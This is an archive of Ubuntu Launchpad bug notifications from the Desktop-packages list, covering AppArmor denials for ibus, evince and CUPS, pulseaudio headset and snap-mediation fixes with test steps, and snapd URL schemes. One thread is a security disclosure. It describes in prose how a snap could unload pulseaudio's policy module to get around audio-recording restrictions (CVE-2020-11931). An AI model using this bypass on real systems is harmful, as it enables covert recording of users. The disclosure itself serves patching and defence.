ibus-daemon) | grep '/dbus' ibus-daem 2973 jamie8u unix 0x 0t0 29606 @/tmp/dbus-oxKYpN30 type=STREAM 4. update the package in -proposed and perform '2' and '3'. The IBUS_ADDRESSES should be the same as before 5. logout of unity, then log back in 6. $ grep IBUS_ADDRESS ~/.config/ibus/bus/*-unix-0 IBUS_ADDRESS=unix:abstract=/tmp/ibus/dbus-SpxOl8Fc,guid=06d4bbeb07614c6dffbf221c57473f4e (notice '/tmp/ibus/' in the path) 7. $ lsof -p $(pidof ibus-daemon) | grep '/dbus' ibus-daem 3471 jamie8u unix 0x 0t0 26107 @/tmp/ibus/dbus-SpxOl8Fc type=STREAM ... (notice '@/tmp/ibus/' in the path) In addition to the above, you can test for regressions by opening 'System Settings' under the 'gear' icon in the panel and selecting 'Text Entry'. From there, add an input source on the right, make sure 'Show current input source in the menu bar' is checked, then use the input source panel indicator to change input sources. Extended test case to verify input support still works in unconfined and confined applications: 1. Systems Settings Language Support, if prompted install the complete language support 2. Install Chinese (simple and traditional) 3. sudo apt-get install ibus-pinyin ibus-sunpinyin 4. logout / login 5. System Settings / Text Entry - add Chinese (Pinyin) (IBus) 6. select pinyin from the indicator 7. sudo lsof | grep ibus | grep @ # will use @/tmp/dbus-... 8. open gnome-calculator and try to type something in (should get a pop-up) 9. open evince and try to search a pdf (should get a pop up) 10. upgrade apparmor and im-config from xenial-proposed 11. logout and back in 12. sudo lsof | grep ibus | grep @ # will use @/tmp/ibus/... 13. open gnome-calculator and try to type something in (should get a pop-up) 14. open evince and try to search a pdf (should get a pop up) 15. verify no new apparmor denials [Regression Potential] The regression potential is considered low because there are no compiled code changes and because the changes only occur after ibus- daemon is restarted, which is upon session start, not package upgrade. When it is restarted, the files in ~/.config/ibus/bus/*-unix-0 are updated accordingly for other applications to pick up. This change intentionally requires a change to the unity7 snapd interface, which is in already done. This change intentionally requires a change to apparmor to add a unix rule for communicating with the new ibus address. This is in xenial- proposed 2.10.95-0ubuntu2.3 (and 2.10.95-0ubuntu2.4). The packages changes to im-config use 'Breaks: apparmor (<< 2.10.95-0ubuntu2.3) to ensure that the apparmor abstraction is updated and policy recompiled before ibus is restarted. This was omitted from the initial im-config upload which resulted in bug #1588197. Test cases
[Desktop-packages] [Bug 1881294] Re: Apparmor blocks evince GUI-Input-Dialogs
*** This bug is a duplicate of bug 1856738 *** https://bugs.launchpad.net/bugs/1856738 @Reinhard, you are now hitting bug #1856738 which prevents @{HOME} from being used in the peer_addr for an abstract socket. For now, I suggest updating /etc/apparmor.d/abstractions/ibus to have: unix (connect, receive, send) type=stream peer=(addr="@/home/teachers/*/.cache/ibus/dbus-*"), ** This bug has been marked a duplicate of bug 1856738 access always denied when using @{HOME} tunable in peer_addr for abstract socket -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to evince in Ubuntu. https://bugs.launchpad.net/bugs/1881294 Title: Apparmor blocks evince GUI-Input-Dialogs Status in evince package in Ubuntu: Invalid Bug description: Network Users (LDAP + NFS4 home) cannot interact with evince GUI- input-elements. * page navigation per number not possible * select pages to print not possible * save open PDF with different name not possible Local user on the same machine behaves as expected. apparmor messages in /var/log/syslog May 29 14:37:07 r002pc51 kernel: [15848.736916] audit: type=1400 audit(1590755827.768:827): apparmor="DENIED" operation="file_lock" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.cache/event- sound-cache.tdb.2176809057334199ab75052753e0683a.x86_64-pc-linux-gnu" pid=34988 comm="evince" requested_mask="k" denied_mask="k" fsuid=4515 ouid=4515 May 29 14:37:07 r002pc51 kernel: [15848.739259] audit: type=1400 audit(1590755827.772:828): apparmor="DENIED" operation="link" profile="/usr/bin/evince" name="/home/teachers/ttfinr/.local/share /gvfs-metadata/.open04eaJ8" pid=34988 comm="pool-evince" requested_mask="l" denied_mask="l" fsuid=4515 ouid=4515 target="/home/teachers/ttfinr/.local/share/gvfs-metadata/home" May 29 14:37:07 r002pc51 kernel: [15848.739974] audit: type=1400 audit(1590755827.772:829): apparmor="DENIED" operation="open" profile="/usr/bin/evince" name="/run/user/4515/gvfs- metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="r" denied_mask="r" fsuid=4515 ouid=4515 May 29 14:37:07 r002pc51 kernel: [15848.740088] audit: type=1400 audit(1590755827.772:830): apparmor="DENIED" operation="unlink" profile="/usr/bin/evince" name="/run/user/4515/gvfs- metadata/.openumWxE7" pid=34988 comm="pool-evince" requested_mask="d" denied_mask="d" fsuid=4515 ouid=4515 To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/evince/+bug/1881294/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1721704] Re: Printer settings stuck on loading drivers database
@Till, the boot_id issue is being tracked here: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1872564 -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to system-config-printer in Ubuntu. https://bugs.launchpad.net/bugs/1721704 Title: Printer settings stuck on loading drivers database Status in apparmor package in Ubuntu: New Status in system-config-printer package in Ubuntu: Incomplete Bug description: 1) Description: Ubuntu Artful Aardvark (development branch) Release: 17.10 2) ubuntu-settings: Installed: 17.10.17 Candidate: 17.10.17 3) The printer configuration goes fine and I can print 4) Printer settings stuck on loading drivers database and finally no drivers list available. Only 'cancel' button active. Note: I'm trying to configure a Brother HL-2030 connected to Network through a FritzBox 7940 router. The printer works fine both on Fedora and macOS X systems. I opened 'System Settings', then select 'Devices' > 'Printers' > 'Add a Printer'. I entered the router address and the window shows me correctly a 'JetDirect-Printer' on 192.168.178.1. I selected the printer and pressed the 'Add' button, a window 'Select Printer Driver' appears and stuck with 'Loading drivers database...'. After about 2 minutes, stopped loading and remains blank. No drivers selection is available and I can only push the 'Cancel' button. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1721704/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1878621] Re: [snap] uim input method does not work
I suggest following/participating in the discussion in the forum topic for snapd/ecosystem updates and use this bug to track chromium-browser's use of those updates. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1878621 Title: [snap] uim input method does not work Status in chromium-browser package in Ubuntu: Confirmed Bug description: I use the uim input method, which works fine with non-snap apps, and used to work with the non-snap package of Chromium. In 20.04, chromium package now becomes a snap, and uim input method not longer works (rendering the browser useless). With some searching I found similar issues with other input methods, some of which have been addresses. It appears that it is now the responsibility of every snap packager to support input methods, and the snap cannot rely upon system-configured methods. So please support UIM. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/chromium-browser/+bug/1878621/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1876065] Re: After unplug headphones and plug them again no sound can be heard
Rather than superseding 1:13.99.1-1ubuntu4 in groovy-proposed, I instead based the changes in 1:13.99.1-1ubuntu5 on top of 1:13.99.1-1ubuntu4 to address the CVE that was fixed in https://usn.ubuntu.com/4355-1/. ** Also affects: pulseaudio (Ubuntu Groovy) Importance: High Assignee: Kai-Heng Feng (kaihengfeng) Status: Fix Committed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1876065 Title: After unplug headphones and plug them again no sound can be heard Status in pulseaudio package in Ubuntu: Fix Committed Status in pulseaudio source package in Focal: Fix Committed Status in pulseaudio source package in Groovy: Fix Committed Bug description: * Impact Sound isn't automatically redirected to headphones when those are connected to a jack interface * Test case Disconnect the headsets Start your webbrowser/music player/video player and play some sound Connect the headsets to the jack interface -> the sound should be directly redirected to the plugged headsets * Regression potential Check that audio routing when connecting/disconnecting devices to the hack entry is working correctly After startup with headset plugged in they play sound nicely - no issue. When they are unplugged, the sound is switched to the speaker (laptop) - all good. However, when I plug the headset back there is no sound. I see the app on pavucontrol, the volume is fine - everything looks fine except there is no sound. I dumped output of "pactl list" command on startup (headset plugged), after unplugging the headset, and when it is plugged back. From the comparison of these outputs, it looks like the source has got muted after the headset is plugged. Source #1 State: RUNNING Name: alsa_input.pci-_00_1f.3.analog-stereo Description: Built-in Audio Analog Stereo Driver: module-alsa-card.c Sample Specification: s16le 2ch 44100Hz Channel Map: front-left,front-right Owner Module: 7 Mute: yes Attached three outputs: headset-in.txt - after startup with headset plugged - all fine. headset-out.txt - after unplugged headset - sound through the speaker - all fine. headset-back.txt - after plugged headset back - no sound. Any help greatly appreciated. Regards, Roman To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1876065/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
Uploaded https://launchpad.net/ubuntu/+source/pulseaudio/1:13.99.1-1ubuntu5 to groovy based on 1:13.99.1-1ubuntu4 from groovy-proposed. ** Changed in: pulseaudio (Ubuntu Groovy) Status: In Progress => Fix Committed -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1877102 Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps Status in pulseaudio package in Ubuntu: Fix Committed Status in pulseaudio source package in Xenial: Fix Released Status in pulseaudio source package in Bionic: Fix Released Status in pulseaudio source package in Eoan: Fix Released Status in pulseaudio source package in Focal: Fix Released Status in pulseaudio source package in Groovy: Fix Committed Bug description: This collates information about a security vulnerability discussed in email. It has been assigned CVE-2020-11931. Ubuntu's PulseAudio package is shipped with a custom "module-snap- policy" module intended to restrict snap confined clients from recording audio unless they have the "audio-record" plug connected. However, it does not restrict access to the "PA_COMMAND_UNLOAD_MODULE" command. This allows a snap that has only plugged "audio-playback" to request that PulseAudio unload the security policy module, which in turn makes it possible to record audio. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1877102/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
I'll apply the focal patch to what is in groovy-proposed. ** Changed in: pulseaudio (Ubuntu Groovy) Assignee: (unassigned) => Jamie Strandboge (jdstrand) ** Changed in: pulseaudio (Ubuntu Groovy) Status: Triaged => In Progress -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1877102 Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps Status in pulseaudio package in Ubuntu: In Progress Status in pulseaudio source package in Xenial: Fix Released Status in pulseaudio source package in Bionic: Fix Released Status in pulseaudio source package in Eoan: Fix Released Status in pulseaudio source package in Focal: Fix Released Status in pulseaudio source package in Groovy: In Progress Bug description: This collates information about a security vulnerability discussed in email. It has been assigned CVE-2020-11931. Ubuntu's PulseAudio package is shipped with a custom "module-snap- policy" module intended to restrict snap confined clients from recording audio unless they have the "audio-record" plug connected. However, it does not restrict access to the "PA_COMMAND_UNLOAD_MODULE" command. This allows a snap that has only plugged "audio-playback" to request that PulseAudio unload the security policy module, which in turn makes it possible to record audio. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1877102/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1869819] Re: [SRU] System can't detect external headset in the codec of Conexant
FYI, the upload to bionic-proposed was superseded by https://usn.ubuntu.com/4355-1/. Please rebase your changes on that and reupload. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1869819 Title: [SRU] System can't detect external headset in the codec of Conexant Status in OEM Priority Project: Confirmed Status in OEM Priority Project bionic series: New Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Bionic: In Progress Status in pulseaudio source package in Focal: Fix Released Bug description: [Impact] In some hp's devices, there are two audio jacks(one headset and one headphone) in the audio interface which is using the codec of Conexant, and apparently it's not working, the system can't detect the headset in current codec. [Test Case] 1. Insert 4 rings(3 stripes) headset into front audio port (headset icon) 2. Check System Setting->Sound->Output [Expected result] Can detect external headset [Actual result] Only shows internal speaker. External headset microphone was detected. Another front audio port (earphone icon) works fine. [Regression Potential] Low. [Failure rate] 100% [Additional information] system-product-name: HP EliteDesk 800 G5 SFF CPU: Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (8x) GPU: 00:02.0 VGA compatible controller [0300]: Intel Corporation Device [8086:3e98] (rev 02) OS-version: 18.04 kernel-version: 4.15.0-1065-oem pulseaudio-version: 1:11.1-1ubuntu7.2 Upstream issue: https://gitlab.freedesktop.org/pulseaudio/pulseaudio/-/merge_requests/272 Ubuntu-Focal-Source: https://code.launchpad.net/~hugh712/ubuntu/+source/pulseaudio/+git/pulseaudio/+ref/focal-1869819 PPA: https://launchpad.net/~hugh712/+archive/ubuntu/sru-1869819 To manage notifications about this bug go to: https://bugs.launchpad.net/oem-priority/+bug/1869819/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1876065] Re: After unplug headphones and plug them again no sound can be heard
FYI, the upload to focal-proposed was superseded by https://usn.ubuntu.com/4355-1/. Please rebase your changes on that and reupload. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1876065 Title: After unplug headphones and plug them again no sound can be heard Status in pulseaudio package in Ubuntu: Fix Committed Status in pulseaudio source package in Focal: Fix Committed Bug description: * Impact Sound isn't automatically redirected to headphones when those are connected to a jack interface * Test case Disconnect the headsets Start your webbrowser/music player/video player and play some sound Connect the headsets to the jack interface -> the sound should be directly redirected to the plugged headsets * Regression potential Check that audio routing when connecting/disconnecting devices to the hack entry is working correctly After startup with headset plugged in they play sound nicely - no issue. When they are unplugged, the sound is switched to the speaker (laptop) - all good. However, when I plug the headset back there is no sound. I see the app on pavucontrol, the volume is fine - everything looks fine except there is no sound. I dumped output of "pactl list" command on startup (headset plugged), after unplugging the headset, and when it is plugged back. From the comparison of these outputs, it looks like the source has got muted after the headset is plugged. Source #1 State: RUNNING Name: alsa_input.pci-_00_1f.3.analog-stereo Description: Built-in Audio Analog Stereo Driver: module-alsa-card.c Sample Specification: s16le 2ch 44100Hz Channel Map: front-left,front-right Owner Module: 7 Mute: yes Attached three outputs: headset-in.txt - after startup with headset plugged - all fine. headset-out.txt - after unplugged headset - sound through the speaker - all fine. headset-back.txt - after plugged headset back - no sound. Any help greatly appreciated. Regards, Roman To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1876065/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1877102] Re: snap policy module can be unloaded, circumventing audio recording restrictions for snaps
** Changed in: pulseaudio (Ubuntu Groovy) Importance: High => Medium ** Changed in: pulseaudio (Ubuntu Focal) Importance: Undecided => Medium ** Changed in: pulseaudio (Ubuntu Eoan) Importance: Undecided => Medium ** Changed in: pulseaudio (Ubuntu Bionic) Importance: Undecided => Medium ** Changed in: pulseaudio (Ubuntu Xenial) Importance: Undecided => Medium ** Information type changed from Private Security to Public Security -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1877102 Title: snap policy module can be unloaded, circumventing audio recording restrictions for snaps Status in pulseaudio package in Ubuntu: Triaged Status in pulseaudio source package in Xenial: Fix Released Status in pulseaudio source package in Bionic: Fix Released Status in pulseaudio source package in Eoan: Fix Released Status in pulseaudio source package in Focal: Fix Released Status in pulseaudio source package in Groovy: Triaged Bug description: This collates information about a security vulnerability discussed in email. It has been assigned CVE-2020-11931. Ubuntu's PulseAudio package is shipped with a custom "module-snap- policy" module intended to restrict snap confined clients from recording audio unless they have the "audio-record" plug connected. However, it does not restrict access to the "PA_COMMAND_UNLOAD_MODULE" command. This allows a snap that has only plugged "audio-playback" to request that PulseAudio unload the security policy module, which in turn makes it possible to record audio. To manage notifications about this bug go to: https://bugs.launchpad.net/ubuntu/+source/pulseaudio/+bug/1877102/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1873764] Re: CUPS Apparmor Error opening /proc/sys/kernel/random/boot_id
*** This bug is a duplicate of bug 1872564 *** https://bugs.launchpad.net/bugs/1872564 This is a dupe of https://bugs.launchpad.net/ubuntu/+source/apparmor/+bug/1872564 which, AIUI, the server team will be performing an SRU for. ** This bug has been marked a duplicate of bug 1872564 /proc/sys/kernel/random/boot_id rule missing from abstractions/nameservice -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to cups in Ubuntu. https://bugs.launchpad.net/bugs/1873764 Title: CUPS Apparmor Error opening /proc/sys/kernel/random/boot_id Status in cups package in Ubuntu: Confirmed Bug description: I noted the following messages on a just installed Ubuntu Focal: $ dmesg | grep cups [ 1769.505132] audit: type=1400 audit(1587372138.575:3011): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15230 comm="cups-browsed" capability=23 capname="sys_nice" [ 1776.623181] audit: type=1400 audit(1587372145.693:3012): apparmor="DENIED" operation="capable" profile="/usr/sbin/cups-browsed" pid=15510 comm="cups-browsed" capability=23 capname="sys_nice" [ 2040.426033] audit: type=1400 audit(1587372409.494:3013): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2040.426044] audit: type=1400 audit(1587372409.494:3014): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2040.426074] audit: type=1400 audit(1587372409.494:3015): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2040.426092] audit: type=1400 audit(1587372409.494:3016): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2040.426106] audit: type=1400 audit(1587372409.494:3017): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404914] audit: type=1400 audit(1587372410.473:3018): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404920] audit: type=1400 audit(1587372410.473:3019): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404926] audit: type=1400 audit(1587372410.473:3020): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404953] audit: type=1400 audit(1587372410.473:3021): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2041.404963] audit: type=1400 audit(1587372410.473:3022): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925327] audit: type=1400 audit(1587372440.994:3028): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925330] audit: type=1400 audit(1587372440.994:3029): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925337] audit: type=1400 audit(1587372440.994:3030): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925382] audit: type=1400 audit(1587372440.994:3031): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 [ 2071.925391] audit: type=1400 audit(1587372440.994:3032): apparmor="DENIED" operation="open" profile="/usr/sbin/cupsd" name="/proc/sys/kernel/random/boot_id" pid=15508 comm="cupsd" requested_mask="r" denied_mask="r" fsuid=0 ouid=0 It happened after installing Brother DCPL3550CDW Linux drivers. ProblemType: Bug DistroRelease: Ubuntu 20.04 Package: cups-daemon 2.3.1-9ubuntu1 ProcVersionSignature: Ubuntu 5.4.0-25.29-lowlatency 5.4.30 Uname: Linux 5.4.0-25-lowlatency x86_64
[Desktop-packages] [Bug 1869819] Re: [SRU] System can't detect external headset in the codec of Conexant
FYI, there is a pending update that will go out either tomorrow or early next week. Please base your next upload on this update. -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1869819 Title: [SRU] System can't detect external headset in the codec of Conexant Status in OEM Priority Project: Confirmed Status in OEM Priority Project bionic series: New Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Bionic: In Progress Status in pulseaudio source package in Focal: Fix Released Bug description: [Impact] In some hp's devices, there are two audio jacks(one headset and one headphone) in the audio interface which is using the codec of Conexant, and apparently it's not working, the system can't detect the headset in current codec. [Test Case] 1. Insert 4 rings(3 stripes) headset into front audio port (headset icon) 2. Check System Setting->Sound->Output [Expected result] Can detect external headset [Actual result] Only shows internal speaker. External headset microphone was detected. Another front audio port (earphone icon) works fine. [Regression Potential] Low. [Failure rate] 100% [Additional information] system-product-name: HP EliteDesk 800 G5 SFF CPU: Intel(R) Core(TM) i7-9700 CPU @ 3.00GHz (8x) GPU: 00:02.0 VGA compatible controller [0300]: Intel Corporation Device [8086:3e98] (rev 02) OS-version: 18.04 kernel-version: 4.15.0-1065-oem pulseaudio-version: 1:11.1-1ubuntu7.2 Upstream issue: https://gitlab.freedesktop.org/pulseaudio/pulseaudio/-/merge_requests/272 Ubuntu-Focal-Source: https://code.launchpad.net/~hugh712/ubuntu/+source/pulseaudio/+git/pulseaudio/+ref/focal-1869819 PPA: https://launchpad.net/~hugh712/+archive/ubuntu/sru-1869819 To manage notifications about this bug go to: https://bugs.launchpad.net/oem-priority/+bug/1869819/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1776873] Re: Whitelisted allowedURLschemes breaks some desktop apps
FYI, in recent PR discussions[1] we've acknowledged that we should make it easier to allow different URL schemes into snapd and I laid out some criteria/process ideas on how to make this happen, and I applied that criteria to the zoommtg PR and it was merged quickly. I discussed with Samuele that we could make this go even faster if we codify things for reviewers as well as some other implementation details. In short, today, the snapd team is in a position to be more responsive with adding new url schemes and we'll make it so we can go even faster. For people who want snapd to support new URL schemes I suggest doing one of: * if you are able, submitting a PR to snapd[2] for the URL schemes you are interested in * filing a new bug[3] for the requested url scheme (eg, "add support for url scheme ...") and then someone can take a look Thanks [1]https://github.com/snapcore/snapd/pull/7731#pullrequestreview-362900171 [2]https://github.com/snapcore/snapd [3]https://bugs.launchpad.net/snapd/+filebug -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to chromium-browser in Ubuntu. https://bugs.launchpad.net/bugs/1776873 Title: Whitelisted allowedURLschemes breaks some desktop apps Status in snapd: Triaged Status in chromium-browser package in Ubuntu: Confirmed Bug description: https://github.com/snapcore/snapd/blob/7952972d4897e085030b288e44dc98b824f6723a/userd/launcher.go#L55 snapd has a hard-coded list of allowed URL schemes. Currently that is limited to "http", "https", "mailto", "snap". We have a number of applications in the store which are trying to use protocol handlers outside this scope and break when that's not possible. e.g. Telegram Desktop: tg:/ Github Desktop: git:/ IRCCloud Desktop: irc:/ These are the ones I know of, others may also be affected. Can we please at least expand the list to those that we know of, and perhaps research other popular protocol handlers? Ideally we wouldn't have a whitelist, because this delays our ability to land new applications with as-yet unknown url schemes. To manage notifications about this bug go to: https://bugs.launchpad.net/snapd/+bug/1776873/+subscriptions -- Mailing list: https://launchpad.net/~desktop-packages Post to : desktop-packages@lists.launchpad.net Unsubscribe : https://launchpad.net/~desktop-packages More help : https://help.launchpad.net/ListHelp
[Desktop-packages] [Bug 1781428] Re: please enable snap mediation support
I confirmed that https://people.canonical.com/~ubuntu-archive/proposed- migration/xenial/update_excuses.html shows no autopkgtest regression for xenial. I also ran through the TEST CASE for this bug and xenial passed. Marking verification-done-xenial ** Tags removed: verification-failed-xenial ** Tags added: verification-done-xenial -- You received this bug notification because you are a member of Desktop Packages, which is subscribed to pulseaudio in Ubuntu. https://bugs.launchpad.net/bugs/1781428 Title: please enable snap mediation support Status in pulseaudio package in Ubuntu: Fix Released Status in pulseaudio source package in Xenial: Fix Committed Status in pulseaudio source package in Bionic: Fix Committed Bug description: [Impact] Ubuntu 16.10 added rudimentary snap support to disable audio recording if the connecting process was a snap. By Ubuntu 18.04, something changed in the build resulting in 'Enable Snappy support: no' with audio recording no longer being mediated by pulseaudio (access to the pulseaudio socket continued to be mediated by snapd's apparmor policy). This resulted in any application with the pulseaudio interface connected to be able to also record. Ubuntu 16.04 never had mediation patches and always allowed recording when the pulseaudio interface was connected. To correct this situation but not regress existing behavior, Ubuntu 19.04's pulseaudio was updated patch to allow playback to all connected clients (snaps or not), record by classic snaps (see bug 1787324) and record by strict mode snaps if either the pulseaudio or new-in-snapd-2.41 audio-record interfaces were connected. With this change, snapd is in a position to migrate snaps to the new audio- playback and audio-record interfaces and properly mediate audio recording (see https://forum.snapcraft.io/t/upcoming-pulseaudio- interface-deprecation/13418). The patch to pulseaudio consists of adding a module, enabling it in default.pa and then when it is enabled, pulseaudio when faced with a record operation will, when the connecting process is a snap (ie, its security label (ie, apparmor label) starts with 'snap.'), query snapd via its control socket to ask if the snap is classic and if not, whether the pulseaudio or audio-record interfaces are connected. Adjusting pulseaudio in the manner does not require coordination with any release of snapd. It does need a newer version of snapd-glib, which was recently updated to 1.49 in the last SRU. [Test Case] IMPORTANT: if updating pulseaudio while the session is running, either need to reboot for the test or kill pulseaudio so it can restart with the new snap policy For unconfined applications: $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes For confined, non-snap applications: $ sudo apt-get install evince $ aa-exec -p /usr/bin/evince -- paplay /usr/share/sounds/alsa/Noise.wav && echo yes $ rm -f /tmp/out.wav ; aa-exec -p /usr/bin/evince -- parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ aa-exec -p /usr/bin/evince -- paplay /tmp/out.wav && echo "yes" yes For classic snaps: $ sudo snap install test-snapd-classic-confinement --classic $ snap run --shell test-snapd-classic-confinement $ cat /proc/self/attr/current # verify we are classic confined snap.test-snapd-classic-confinement.test-snapd-classic-confinement (complain) $ paplay /usr/share/sounds/alsa/Noise.wav && echo "yes" yes $ rm -f /tmp/out.wav ; parecord /tmp/out.wav && echo "yes" # ctrl-c to stop recording ^Cyes $ paplay /tmp/out.wav && echo "yes" yes $ exit # out of snap run --shell For strict snaps with pulseaudio: $ sudo snap install test-snapd-pulseaudio --edge $ sudo snap connect test-snapd-pulseaudio:pulseaudio $ snap connections test-snapd-pulseaudio Interface Plug Slot Notes pulseaudio test-snapd-pulseaudio:pulseaudio :pulseaudio - $ test-snapd-pulseaudio.play --help # ensure SNAP dirs are created ... $ sudo cp /usr/share/sounds/alsa/Noise.wav /var/snap/test-snapd- pulseaudio/common/ $ test-snapd-pulseaudio.play /var/snap/test-snapd-pulseaudio/common/Noise.wav && echo yes xcb_connection_has_error() returned true yes (note, the xcb_connection_has_error() message is due to the x11 interface not being connected which is unrelated to mediation. x11 is left out to ensure that just audio-playback/audio-record are tested) $ test-snapd-pulseaudio.record /tmp/out.wav && echo yes # should pass ... ^Cyes $ 